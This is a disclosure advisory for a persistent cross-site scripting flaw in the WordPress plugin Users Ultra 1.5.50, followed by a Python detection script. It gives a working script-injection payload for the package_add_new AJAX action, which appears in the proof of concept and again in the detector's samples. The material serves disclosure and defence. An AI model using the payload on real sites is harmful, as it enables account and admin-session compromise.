WordPress Plugin Users Ultra 1.5.50 – Persistent Cross-Site Scripting

  • Author: Panagiotis Vagenas
    Date: 2015-12-03
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/38856/
  • * Exploit Title: WordPress Users Ultra Plugin [Persistence XSS]
    * Discovery Date: 2015/10/20
    * Public Disclosure Date: 2015/12/01
    * Exploit Author: Panagiotis Vagenas
    * Contact: https://twitter.com/panVagenas
    * Vendor Homepage: http://usersultra.com
    * Software Link: https://wordpress.org/plugins/users-ultra/
    * Version: 1.5.50
    * Tested on: WordPress 4.3.1
    * Category: webapps
    
    
    Description
    ================================================================================
    
    Once registered, a user can add new subscription packages or modify
    existing ones. No data sanitization takes place before package details
    are saved in the DB. This allows a malicious user to include JS code in
    the package name and/or package description.
    
    PoC
    ================================================================================
    
    - Send a POST request to
      `http://vuln.site.tld/wp-admin/admin-ajax.php` with data:
      `action=package_add_new&p_name=a<script>alert(1)</script>`
    - Visit
      `http://vuln.site.tld/wp-admin/admin.php?page=userultra&tab=membership`
      as admin, or go to the front-end page that contains package
      information.
    
    Timeline
    ================================================================================
    
    2015/10/29 - Vendor notified via email
    2015/11/11 - Vendor notified via contact form on his website
    2015/11/13 - Vendor notified via support forums at wordpress.org
    2015/11/14 - Vendor responded and received report through email
    
    Solution
    ================================================================================
    
    No official solution yet exists.
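
With no vendor fix available, one stopgap is to watch for the request shape from the PoC. The following is an added example, not part of the original advisory or the plugin's code: it flags `package_add_new` calls to `admin-ajax.php` whose form fields decode to HTML markup. It assumes request records of (method, URL, body) taken from a proxy or WAF log that captures POST bodies; the sample records are constructed.

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

AJAX_PATH = "/wp-admin/admin-ajax.php"   # endpoint named in the PoC
ACTION = "package_add_new"               # AJAX action named in the PoC
TAG_RE = re.compile(r"<[a-zA-Z/!]")      # start of an HTML tag or comment


def fully_decode(value, max_rounds=3):
    """Undo nested URL-encoding so %253Cscript%253E is seen as <script>."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def suspicious_fields(method, url, body):
    """Return the names of fields carrying markup in a package_add_new call."""
    parts = urlsplit(url)
    # endswith() also covers WordPress installed in a subdirectory.
    if method.upper() != "POST" or not parts.path.endswith(AJAX_PATH):
        return []
    # The action may arrive in the query string or in the body.
    fields = parse_qsl(parts.query, keep_blank_values=True)
    fields += parse_qsl(body, keep_blank_values=True)
    if dict(fields).get("action") != ACTION:
        return []
    return [name for name, value in fields
            if name != "action" and TAG_RE.search(fully_decode(value))]


# Constructed sample records: (method, URL, body).
SAMPLE_REQUESTS = [
    ("POST", "http://vuln.site.tld/wp-admin/admin-ajax.php",
     "action=package_add_new&p_name=a<script>alert(1)</script>"),  # PoC body
    ("POST", "http://vuln.site.tld/wp-admin/admin-ajax.php",
     "action=package_add_new&p_name=a%253Cscript%253Ealert(1)%253C%252Fscript%253E"),
    ("POST", "http://vuln.site.tld/wp-admin/admin-ajax.php",
     "action=package_add_new&p_name=Gold+plan"),                   # benign
    ("POST", "http://vuln.site.tld/blog/wp-admin/admin-ajax.php?action=package_add_new",
     "p_name=%3Cb%3EGold%3C%2Fb%3E"),                              # action in query
]

if __name__ == "__main__":
    for method, url, body in SAMPLE_REQUESTS:
        print(suspicious_fields(method, url, body), body)
```

The check matches any tag rather than a list of payloads, so it also covers fields other than `p_name`, such as the package description, whose parameter name the advisory does not give.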